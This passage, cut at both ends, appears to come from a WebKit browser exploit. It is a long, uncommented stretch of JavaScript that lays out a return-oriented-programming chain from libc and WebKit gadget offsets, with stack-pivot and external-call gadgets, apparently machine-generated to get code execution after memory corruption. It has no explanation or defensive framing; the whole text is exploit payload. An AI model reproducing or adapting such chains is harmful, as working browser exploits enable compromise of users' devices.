ropchain+151136, //L2147 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2147: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2148: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2149: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L2150: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+151376, //L2152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+151392, //L2153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+151360, //L2151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2151: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2152: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2153: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+151480, //L2154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+151496, //L2156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2154: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2156: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2157: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L2159: 
db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+151656, //L2162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+151640, //L2160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2160: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2162: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+151832, //L2165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+151848, //L2166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+151800, //L2163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+151816, //L2164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2163: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2164: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2165: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2166: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+151944, //L2168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+151928, //L2167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2167: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2168: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2170: db([15, 0]); // 0xf set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+152056, //L2171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2171: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+152208, //L2174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+152224, //L2175 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+152192, //L2173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2173: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2174: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2175: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+152312, //L2176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+152328, //L2178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2176: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2178: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2179: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L2181: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+152488, //L2184 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+152472, //L2182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2182: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2184: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+152664, //L2187 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+152680, //L2188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+152632, //L2185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+152648, //L2186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2185: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2186: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2187: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2188: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+152776, //L2190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+152760, //L2189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2189: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2190: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2191: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L2192: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+153000, //L2194 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+153016, //L2195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+152984, //L2193 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2193: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2194: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2195: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+153104, //L2196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+153120, //L2198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2196: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2198: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2199: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2200: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2202: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+153296, //L2205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+153280, //L2203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2203: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2205: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+153440, //L2208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+153408, //L2206 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+153424, //L2207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2206: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2207: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2208: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+153512, //L2210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2210: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+153568, //L2211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2211: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+153648, //L2213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2213: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2215: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+153768, //L2218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+153752, //L2216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2216: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2218: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+153944, //L2221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] 
libc_base+764760, //pop rsi ropchain+153960, //L2222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+153912, //L2219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+153928, //L2220 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2219: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2220: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2221: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2222: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+154072, //L2223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+154104, //L2225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+154088, //L2224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2223: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2224: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2225: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+154192, //L2227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2227: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+154248, //L2228 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2228: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 
4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+154320, //L2230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2230: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2232: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L2234: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+154480, //L2237 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+154464, //L2235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2235: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2237: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+154624, //L2240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+154592, //L2238 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+154608, //L2239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2238: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2239: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2240: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+154704, //L2241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2241: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
//L2243: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+154824, //L2246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+154808, //L2244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2244: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2246: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+154968, //L2249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+154936, //L2247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+154952, //L2248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2247: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2248: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2249: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+155040, //L2251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2251: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+155096, //L2252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2252: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+155176, //L2254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2254: 
db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2256: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+155296, //L2259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+155280, //L2257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2257: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2259: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+155472, //L2262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+155488, //L2263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+155440, //L2260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+155456, //L2261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2260: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2261: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2262: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2263: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+155600, //L2264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+155632, //L2266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+155616, //L2265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2264: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2265: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2266: db([0, 
0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+155720, //L2268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2268: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+155776, //L2269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2269: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+155872, //L2272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2272: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+155928, //L2273 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2273: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2275: db([16, 0]); // 0x10 set_gadget(libc_base+763368,); //pop rcx //L2276: db([16, 0]); // 0x10 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+156080, //L2278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2278: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+156136, //L2279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2279: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+156240, //L2281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2281: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2283: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+156360, //L2286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+156344, //L2284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2284: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2286: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+156504, //L2289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+156472, //L2287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+156488, //L2288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2287: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2288: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2289: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 
0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+156584, //L2290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2290: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2292: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+156704, //L2295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+156688, //L2293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2293: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2295: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+156848, //L2298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+156816, //L2296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+156832, //L2297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2296: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2297: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2298: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L2300: ropchain+156952, //L2299 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+86896, //_create_extcall //L2299: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+157024, //L2301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2301: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2303: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+157144, //L2306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157128, //L2304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2304: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2306: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+157288, //L2309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157256, //L2307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, 